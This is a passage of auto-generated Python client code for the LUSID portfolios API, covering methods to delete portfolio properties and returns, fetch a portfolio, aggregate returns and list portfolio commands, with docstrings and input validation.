_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_properties(self, scope, code, property_keys, **kwargs): # noqa: E501
"""DeletePortfolioProperties: Delete portfolio properties # noqa: E501
Delete one or more properties from a particular portfolio. If the properties are time-variant then an effective datetime from which to delete properties must be specified. If the properties are perpetual then it is invalid to specify an effective datetime for deletion. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_properties(scope, code, property_keys, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param property_keys: The property keys of the properties to delete. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. Each property must be from the 'Portfolio' domain. (required)
:type property_keys: list[str]
:param effective_at: The effective datetime or cut label at which to delete time-variant properties from. The property must exist at the specified 'effectiveAt' datetime. If the 'effectiveAt' is not provided or is before the time-variant property exists then a failure is returned. Do not specify this parameter if any of the properties to delete are perpetual.
:type effective_at: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: DeletedEntityResponse
"""
kwargs['_return_http_data_only'] = True
return self.delete_portfolio_properties_with_http_info(scope, code, property_keys, **kwargs) # noqa: E501
def delete_portfolio_properties_with_http_info(self, scope, code, property_keys, **kwargs): # noqa: E501
"""DeletePortfolioProperties: Delete portfolio properties # noqa: E501
Delete one or more properties from a particular portfolio. If the properties are time-variant then an effective datetime from which to delete properties must be specified. If the properties are perpetual then it is invalid to specify an effective datetime for deletion. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_properties_with_http_info(scope, code, property_keys, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param property_keys: The property keys of the properties to delete. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. Each property must be from the 'Portfolio' domain. (required)
:type property_keys: list[str]
:param effective_at: The effective datetime or cut label at which to delete time-variant properties from. The property must exist at the specified 'effectiveAt' datetime. If the 'effectiveAt' is not provided or is before the time-variant property exists then a failure is returned. Do not specify this parameter if any of the properties to delete are perpetual.
:type effective_at: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'property_keys',
'effective_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_properties" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'property_keys' is set
if self.api_client.client_side_validation and ('property_keys' not in local_var_params or # noqa: E501
local_var_params['property_keys'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `property_keys` when calling `delete_portfolio_properties`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "DeletedEntityResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/properties', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_returns(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: DeletedEntityResponse
"""
kwargs['_return_http_data_only'] = True
return self.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs) # noqa: E501
def delete_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'from_effective_at',
'to_effective_at',
'period'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'from_effective_at' is set
if self.api_client.client_side_validation and ('from_effective_at' not in local_var_params or # noqa: E501
local_var_params['from_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `from_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
# verify the required parameter 'to_effective_at' is set
if self.api_client.client_side_validation and ('to_effective_at' not in local_var_params or # noqa: E501
local_var_params['to_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `to_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'return_scope' in local_var_params:
path_params['returnScope'] = local_var_params['return_scope'] # noqa: E501
if 'return_code' in local_var_params:
path_params['returnCode'] = local_var_params['return_code'] # noqa: E501
query_params = []
if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None: # noqa: E501
query_params.append(('fromEffectiveAt', local_var_params['from_effective_at'])) # noqa: E501
if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None: # noqa: E501
query_params.append(('toEffectiveAt', local_var_params['to_effective_at'])) # noqa: E501
if 'period' in local_var_params and local_var_params['period'] is not None: # noqa: E501
query_params.append(('period', local_var_params['period'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "DeletedEntityResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}/$delete', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_portfolio(self, scope, code, **kwargs): # noqa: E501
"""GetPortfolio: Get portfolio # noqa: E501
Retrieve the definition of a particular portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param effective_at: The effective datetime or cut label at which to retrieve the portfolio definition. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to retrieve the portfolio definition. Defaults to returning the latest version of the portfolio definition if not specified.
:type as_at: datetime
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto the portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Portfolio
"""
kwargs['_return_http_data_only'] = True
return self.get_portfolio_with_http_info(scope, code, **kwargs) # noqa: E501
def get_portfolio_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""GetPortfolio: Get portfolio # noqa: E501
Retrieve the definition of a particular portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param effective_at: The effective datetime or cut label at which to retrieve the portfolio definition. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to retrieve the portfolio definition. Defaults to returning the latest version of the portfolio definition if not specified.
:type as_at: datetime
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto the portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Portfolio, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'effective_at',
'as_at',
'property_keys'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "Portfolio",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_portfolio_aggregated_returns(self, scope, code, return_scope, return_code, aggregated_returns_request, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioAggregatedReturns: Aggregated Returns # noqa: E501
Aggregate Returns which are on the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_aggregated_returns(scope, code, return_scope, return_code, aggregated_returns_request, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param aggregated_returns_request: The request used in the AggregatedReturns. (required)
:type aggregated_returns_request: AggregatedReturnsRequest
:param from_effective_at: The start date from which to calculate the Returns.
:type from_effective_at: str
:param to_effective_at: The end date for which to calculate the Returns.
:type to_effective_at: str
:param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfAggregatedReturn
"""
kwargs['_return_http_data_only'] = True
return self.get_portfolio_aggregated_returns_with_http_info(scope, code, return_scope, return_code, aggregated_returns_request, **kwargs) # noqa: E501
def get_portfolio_aggregated_returns_with_http_info(self, scope, code, return_scope, return_code, aggregated_returns_request, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioAggregatedReturns: Aggregated Returns # noqa: E501
Aggregate Returns which are on the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_aggregated_returns_with_http_info(scope, code, return_scope, return_code, aggregated_returns_request, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param aggregated_returns_request: The request used in the AggregatedReturns. (required)
:type aggregated_returns_request: AggregatedReturnsRequest
:param from_effective_at: The start date from which to calculate the Returns.
:type from_effective_at: str
:param to_effective_at: The end date for which to calculate the Returns.
:type to_effective_at: str
:param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfAggregatedReturn, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'aggregated_returns_request',
'from_effective_at',
'to_effective_at',
'as_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_aggregated_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'aggregated_returns_request' is set
if self.api_client.client_side_validation and ('aggregated_returns_request' not in local_var_params or # noqa: E501
local_var_params['aggregated_returns_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `aggregated_returns_request` when calling `get_portfolio_aggregated_returns`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'return_scope' in local_var_params:
path_params['returnScope'] = local_var_params['return_scope'] # noqa: E501
if 'return_code' in local_var_params:
path_params['returnCode'] = local_var_params['return_code'] # noqa: E501
query_params = []
if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None: # noqa: E501
query_params.append(('fromEffectiveAt', local_var_params['from_effective_at'])) # noqa: E501
if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None: # noqa: E501
query_params.append(('toEffectiveAt', local_var_params['to_effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'aggregated_returns_request' in local_var_params:
body_params = local_var_params['aggregated_returns_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3648'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfAggregatedReturn",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}/$aggregated', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_portfolio_commands(self, scope, code, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioCommands: Get portfolio commands # noqa: E501
Get all the commands that modified a particular portfolio, including any input transactions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_commands(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param from_as_at: The lower bound asAt datetime (inclusive) from which to retrieve commands. There is no lower bound if this is not specified.
:type from_as_at: datetime
:param to_as_at: The upper bound asAt datetime (inclusive) from which to retrieve commands. There is no upper bound if this is not specified.
:type to_as_at: datetime
:param filter: Expression to filter the results. For example, to filter on the User ID, specify \"userId.id eq 'string'\". For more information about filtering, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param page: The pagination token to use to continue listing commands; this value is returned from the previous call.
:type page: str
:param limit: When paginating, limit the results to this number. Defaults to 500 if not specified.
:type limit: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfProcessedCommand
"""
kwargs['_return_http_data_only'] = True
return self.get_portfolio_commands_with_http_info(scope, code, **kwargs) # noqa: E501
def get_portfolio_commands_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioCommands: Get portfolio commands # noqa: E501
Get all the commands that modified a particular portfolio, including any input transactions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_commands_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param from_as_at: The lower bound asAt datetime (inclusive) from which to retrieve commands. There is no lower bound if this is not specified.
:type from_as_at: datetime
:param to_as_at: The upper bound asAt datetime (inclusive) from which to retrieve commands. There is no upper bound if this is not specified.
:type to_as_at: datetime
:param filter: Expression to filter the results. For example, to filter on the User ID, specify \"userId.id eq 'string'\". For more information about filtering, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param page: The pagination token to use to continue listing commands; this value is returned from the previous call.
:type page: str
:param limit: When paginating, limit the results to this number. Defaults to 500 if not specified.
:type limit: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfProcessedCommand, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'from_as_at',
'to_as_at',
'filter',
'page',
'limit'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_commands" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
